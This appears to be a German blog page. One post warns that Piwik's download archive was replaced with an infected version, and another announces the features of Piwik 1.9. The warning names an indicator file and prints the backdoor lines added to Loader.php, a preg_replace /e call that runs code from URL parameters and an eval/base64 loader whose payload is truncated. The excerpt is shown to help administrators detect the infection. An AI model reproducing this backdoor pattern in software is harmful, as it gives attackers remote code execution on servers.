Infizierte Version von Piwik entdeckt

Werbung

Wie im Piwik Forum zu lesen ist (Link), ist eine infizierte Version von Piwik im Umlauf. Die latest.zip auf dem Piwik Download Server wurde gegen eine infizierte Version ausgetauscht.

Erkennbar ist dies, wenn sich die Datei „piwik/core/DataTable/Filter/Megre.php“ auf dem Server befindet und die letzten Zeilen von „piwik/core/Loader.php“ in etwa so aussehen:

Werbung
Error_Reporting(0); 	
if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');     
    exit;
  }
  if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode(.....

Leider wurde bisher offiziell nicht gewarnt, also zum Beispiel im Blog, der auch per RSS erreichbar ist.

Piwik Update 1.9 erschienen

Heute ist die Version 1.9 von Piwik erschienen. Piwik ist ein Statistik Tool ähnlich wie Google Analytics. Der Vorteil ist, dass Piwik als Open Source auf dem eigenen Server installiert werden kann und man selbst die Kontrolle über die eigenen Daten hat.

Neu in der Version 1.9:

1. Transition Plugin: Visuelle Darstellung des Benutzerflußes
2. Site Search Analyse
3. GeoIP Integration zur Anzeige der Herkunft der Besucher

Link zu Piwik 1.9
Link zu Piwik